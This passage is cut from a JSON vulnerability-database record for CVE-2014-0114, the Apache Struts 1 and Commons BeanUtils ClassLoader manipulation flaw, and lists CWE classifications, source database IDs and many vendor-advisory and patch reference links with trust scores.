"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a"
},
{
"title": "IBM: Security Bulletin: Netcool Operations Insight v1.6.6 contains fixes for multiple security vulnerabilities.",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=68c6989b84f14aaac220c13b754c7702"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - January 2015",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4a692d6d60aa31507cb101702b494c51"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - October 2016",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - July 2018",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=5f8c525f1408011628af1792207b2099"
},
{
"title": "struts1-patch",
"trust": 0.1,
"url": "https://github.com/ricedu/struts1-patch "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/weblegacy/struts1 "
},
{
"title": "struts1filter",
"trust": 0.1,
"url": "https://github.com/rgielen/struts1filter "
},
{
"title": "StrutsExample",
"trust": 0.1,
"url": "https://github.com/vikasvns2000/StrutsExample "
},
{
"title": "struts-mini",
"trust": 0.1,
"url": "https://github.com/bingcai/struts-mini "
},
{
"title": "strutt-cve-2014-0114",
"trust": 0.1,
"url": "https://github.com/anob3it/strutt-cve-2014-0114 "
},
{
"title": "super-pom",
"trust": 0.1,
"url": "https://github.com/ian4hu/super-pom "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2014-0114"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-581"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006468"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-000056"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-20",
"trust": 1.0
},
{
"problemtype": "Use of unmaintained third-party components (CWE-1104) [IPA Evaluation ]",
"trust": 0.8
},
{
"problemtype": " Path traversal (CWE-22) [IPA Evaluation ]",
"trust": 0.8
},
{
"problemtype": " Execution with unnecessary privileges (CWE-250) [IPA Evaluation ]",
"trust": 0.8
},
{
"problemtype": " Inappropriate authorization (CWE-285) [IPA Evaluation ]",
"trust": 0.8
},
{
"problemtype": " Improper authentication (CWE-287) [IPA Evaluation ]",
"trust": 0.8
},
{
"problemtype": " Authentication bypass using alternate path or channel (CWE-288) [IPA Evaluation ]",
"trust": 0.8
},
{
"problemtype": " Inappropriate restriction of excessive authentication attempts (CWE-307) [IPA Evaluation ]",
"trust": 0.8
},
{
"problemtype": " Unlimited upload of dangerous types of files (CWE-434) [IPA Evaluation ]",
"trust": 0.8
},
{
"problemtype": " Inadequate protection of credentials (CWE-522) [IPA Evaluation ]",
"trust": 0.8
},
{
"problemtype": " Cross-site scripting (CWE-79) [IPA Evaluation ]",
"trust": 0.8
},
{
"problemtype": " Lack of certification (CWE-862) [IPA Evaluation ]",
"trust": 0.8
},
{
"problemtype": " Private features (CWE-912) [IPA Evaluation ]",
"trust": 0.8
},
{
"problemtype": "CWE-DesignError",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-006468"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-000056"
},
{
"db": "NVD",
"id": "CVE-2014-0114"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.8,
"url": "http://www.securityfocus.com/bid/67121"
},
{
"trust": 2.5,
"url": "http://www.vmware.com/security/advisories/vmsa-2014-0008.html"
},
{
"trust": 2.2,
"url": "http://www.vmware.com/security/advisories/vmsa-2014-0012.html"
},
{
"trust": 2.2,
"url": "http://www.debian.org/security/2014/dsa-2940"
},
{
"trust": 2.2,
"url": "http://www.ibm.com/support/docview.wss?uid=swg21675496"
},
{
"trust": 1.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg27042296"
},
{
"trust": 1.9,
"url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html"
},
{
"trust": 1.9,
"url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html"
},
{
"trust": 1.9,
"url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html"
},
{
"trust": 1.9,
"url": "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html"
},
{
"trust": 1.9,
"url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html"
},
{
"trust": 1.9,
"url": "http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html"
},
{
"trust": 1.9,
"url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html"
},
{
"trust": 1.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676303"
},
{
"trust": 1.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675266"
},
{
"trust": 1.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676110"
},
{
"trust": 1.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677110"
},
{
"trust": 1.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675689"
},
{
"trust": 1.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674812"
},
{
"trust": 1.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674128"
},
{
"trust": 1.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675972"
},
{
"trust": 1.7,
"url": "http://jvn.jp/en/jp/jvn30962312/index.html"
},
{
"trust": 1.7,
"url": "http://advisories.mageia.org/mgasa-2014-0219.html"
},
{
"trust": 1.7,
"url": "https://security.gentoo.org/glsa/201607-09"
},
{
"trust": 1.7,
"url": "https://access.redhat.com/errata/rhsa-2019:2995"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/918ec15a80fc766ff46c5d769cb8efc88fed6674faadd61a7105166b%40%3cannounce.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://openwall.com/lists/oss-security/2014/06/15/10"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/31f9dc2c9cb68e390634a4202f84b8569f64b6569bfcce46348fd9fd%40%3ccommits.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://issues.apache.org/jira/browse/beanutils-463"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/57477"
},
{
"trust": 1.6,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675898"
},
{
"trust": 1.6,
"url": "http://openwall.com/lists/oss-security/2014/07/08/1"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/40fc236a35801a535cd49cf1979dbeab034b833c63a284941bce5bf1%40%3cdev.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://security.netapp.com/advisory/ntap-20140911-0001/"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/c24c0b931632a397142882ba248b7bd440027960f22845c6f664c639%40%3ccommits.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/6b30629b32d020c40d537f00b004d281c37528d471de15ca8aec2cd4%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59430"
},
{
"trust": 1.6,
"url": "http://seclists.org/fulldisclosure/2014/dec/23"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/58851"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/fda473f46e51019a78ab217a7a3a3d48dafd90846e75bd5536ef72f3%40%3cnotifications.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59704"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/3f500972dceb48e3cb351f58565aecf6728b1ea7a69593af86c30b30%40%3cissues.activemq.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/d27c51b3c933f885460aa6d3004eb228916615caaaddbb8e8bfeeb40%40%3cgitbox.activemq.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3cdev.drill.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/r75d67108e557bb5d4c4318435067714a0180de525314b7e8dab9d04e%40%3cissues.activemq.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/0efed939139f5b9dcd62b8acf7cb8a9789227d14abdc0c6f141c4a4c%40%3cissues.activemq.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59480"
},
{
"trust": 1.6,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676091"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/0a35108a56e2d575e3b3985588794e39fbf264097aba66f4c5569e4f%40%3cuser.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59246"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59245"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59479"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59118"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/6afe2f935493e69a332b9c5a4f23cafe95c15ede1591a492cf612293%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://apache-ignite-developers.2346864.n4.nabble.com/cve-2014-0114-apache-ignite-is-vulnerable-to-existing-cve-2014-0114-td31205.html"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/58947"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/42ad6326d62ea8453d0d0ce12eff39bbb7c5b4fca9639da007291346%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/88c497eead24ed517a2bb3159d3dc48725c215e97fe7a98b2cf3ea25%40%3cdev.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/r458d61eaeadecaad04382ebe583230bc027f48d9e85e4731bc573477%40%3ccommits.dolphinscheduler.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/97fc033dad4233a5d82fcb75521eabdd23dd99ef32eb96f407f96a1a%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1091938"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3cissues.drill.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/aa4ca069c7aea5b1d7329bc21576c44a39bcc4eb7bb2760c4b16f2f6%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136958.html"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59014"
},
{
"trust": 1.6,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1116665"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/58710"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/1565e8b786dff4cb3b48ecc8381222c462c92076c9e41408158797b5%40%3ccommits.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/ffde3f266d3bde190b54c9202169e7918a92de7e7e0337d792dc7263%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/65b39fa6d700e511927e5668a4038127432178a210aff81500eb36e5%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675387"
},
{
"trust": 1.6,
"url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html"
},
{
"trust": 1.6,
"url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/archive/1/534161/100/0/threaded"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3cdev.drill.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://commons.apache.org/proper/commons-beanutils/javadocs/v1.9.2/release-notes.txt"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/cee6b1c4533be1a753614f6a7d7c533c42091e7cafd7053b8f62792a%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59464"
},
{
"trust": 1.6,
"url": "https://access.redhat.com/errata/rhsa-2018:2669"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/4c3fd707a049bfe0577dba8fc9c4868ffcdabe68ad86586a0a49242e%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/09981ae3df188a2ad1ce20f62ef76a5b2d27cf6b9ebab366cf1d6cc6%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/df093c662b5e49fe9e38ef91f78ffab09d0839dea7df69a747dffa86%40%3cdev.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05324755"
},
{
"trust": 1.6,
"url": "http://marc.info/?l=bugtraq\u0026m=140119284401582\u0026w=2"
},
{
"trust": 1.6,
"url": "http://marc.info/?l=bugtraq\u0026m=141451023707502\u0026w=2"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59228"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3%40%3cdevnull.infra.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676931"
},
{
"trust": 1.6,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676375"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/f3682772e62926b5c009eed63c62767021be6da0bb7427610751809f%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/60177"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451%40%3csolr-user.lucene.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/15fcdf27fa060de276edc0b4098526afc21c236852eb3de9be9594f3%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/df1c385f2112edffeff57a6b21d12e8d24031a9f578cb8ba22a947a8%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://www.mandriva.com/security/advisories?name=mdvsa-2014:095"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/098e9aae118ac5c06998a9ba4544ab2475162981d290fdef88e6f883%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/2ba22f2e3de945039db735cf6cbf7f8be901ab2537337c7b1dd6a0f0%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/0340493a1ddf3660dee09a5c503449cdac5bec48cdc478de65858859%40%3cdev.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3csolr-user.lucene.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/60703"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/ebc4f019798f6ce2a39f3e0c26a9068563a9ba092cdf3ece398d4e2f%40%3cnotifications.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59718"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/080af531a9113e29d3f6a060e3f992dc9f40315ec7234e15c3b339e3%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3ccommits.druid.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/9b5505632f5683ee17bda4f7878525e672226c7807d57709283ffa64%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/66176fa3caeca77058d9f5b0316419a43b4c3fa2b572e05b87132226%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c%40%3ccommits.pulsar.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://marc.info/?l=bugtraq\u0026m=140801096002766\u0026w=2"
},
{
"trust": 1.6,
"url": "https://security.netapp.com/advisory/ntap-20180629-0006/"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55%40%3csolr-user.lucene.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://access.redhat.com/solutions/869353"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/869c08899f34c1a70c9fb42f92ac0d043c98781317e0c19d7ba3f5e3%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/c7e31c3c90b292e0bafccc4e1b19c9afc1503a65d82cb7833dfd7478%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/2454e058fd05ba30ca29442fdeb7ea47505d47a888fbc9f3a53f31d0%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/8e2bdfabd5b14836aa3cf900aa0a62ff9f4e22a518bb4e553ebcf55f%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/084ae814e69178d2ce174cfdf149bc6e46d7524f3308c08d3adb43cb%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.2,
"url": "https://rhn.redhat.com/errata/rhsa-2014-0497.html"
},
{
"trust": 0.9,
"url": "http://www.liferay.com/community/security-team/known-vulnerabilities/-/asset_publisher/t8ei/content/cst-sa-lps-46552-struts-1-classloader-manipulation"
},
{
"trust": 0.9,
"url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10643\u0026cat=sirt_1\u0026actp=list"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674435"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674428"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674937"
},
{
"trust": 0.9,
"url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04311273"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675822"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673663"
},
{
"trust": 0.9,
"url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs14-018/index.html"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21672316"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676375"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673098"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673944"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673101"
},
{
"trust": 0.9,
"url": "https://rhn.redhat.com/errata/rhsa-2014-0498.html"
},
{
"trust": 0.9,
"url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04399728"
},
{
"trust": 0.9,
"url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04473828"
},
{
"trust": 0.9,
"url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05324755"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv61061"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21680848"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676646"
},
{
"trust": 0.9,
"url": "http://struts.apache.org/release/2.3.x/docs/s2-021.html"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg27042186"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg27042185"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg27042184"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv61039"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv61058"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037507"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678830"
},
{
"trust": 0.9,
"url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs14-020/index.html"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037825"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037409"
},
{
"trust": 0.9,
"url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037506"
},
{
"trust": 0.9,
"url": "https://rhn.redhat.com/errata/rhsa-2014-0500.html"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004807"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673757"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673508"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673695"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674099"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674104"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673992"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674110"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673982"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673422"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678359"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680716"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21675387"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21677802"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674310"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674191"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674017"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674016"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674339"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677449"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675496"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676485"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21677298"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674613"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676091"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673878"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673877"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674113"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674905"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21679331"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680698"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037424"
},
{
"trust": 0.9,
"url": "http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15282.html"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680194"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677352"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037622"
},
{
"trust": 0.9,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0114"
},
{
"trust": 0.8,
"url": "http://jvn.jp/vu/jvnvu96290700/index.html"
},
{
"trust": 0.8,
"url": "https://www.us-cert.gov/ics/recommended-practices"
},
{
"trust": 0.8,
"url": "https://www.us-cert.gov/ics/advisories/icsma-20-184-01"
},
{
"trust": 0.8,
"url": "https://www.fda.gov/medical-devices/digital-health/cybersecurity"
},
{
"trust": 0.8,
"url": "http://jvndb.jvn.jp/ja/contents/2014/jvndb-2014-002308.html"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0114"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-0114"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/6afe2f935493e69a332b9c5a4f23cafe95c15ede1591a492cf612293@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/df093c662b5e49fe9e38ef91f78ffab09d0839dea7df69a747dffa86@%3cdev.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/ebc4f019798f6ce2a39f3e0c26a9068563a9ba092cdf3ece398d4e2f@%3cnotifications.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/15fcdf27fa060de276edc0b4098526afc21c236852eb3de9be9594f3@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5@%3csolr-user.lucene.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/2ba22f2e3de945039db735cf6cbf7f8be901ab2537337c7b1dd6a0f0@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/2454e058fd05ba30ca29442fdeb7ea47505d47a888fbc9f3a53f31d0@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/97fc033dad4233a5d82fcb75521eabdd23dd99ef32eb96f407f96a1a@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/8e2bdfabd5b14836aa3cf900aa0a62ff9f4e22a518bb4e553ebcf55f@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/fda473f46e51019a78ab217a7a3a3d48dafd90846e75bd5536ef72f3@%3cnotifications.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/f3682772e62926b5c009eed63c62767021be6da0bb7427610751809f@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c@%3ccommits.pulsar.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/31f9dc2c9cb68e390634a4202f84b8569f64b6569bfcce46348fd9fd@%3ccommits.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55@%3csolr-user.lucene.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/6b30629b32d020c40d537f00b004d281c37528d471de15ca8aec2cd4@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/1565e8b786dff4cb3b48ecc8381222c462c92076c9e41408158797b5@%3ccommits.commons.apache.org%3e"
},
{
"trust": 0.6,
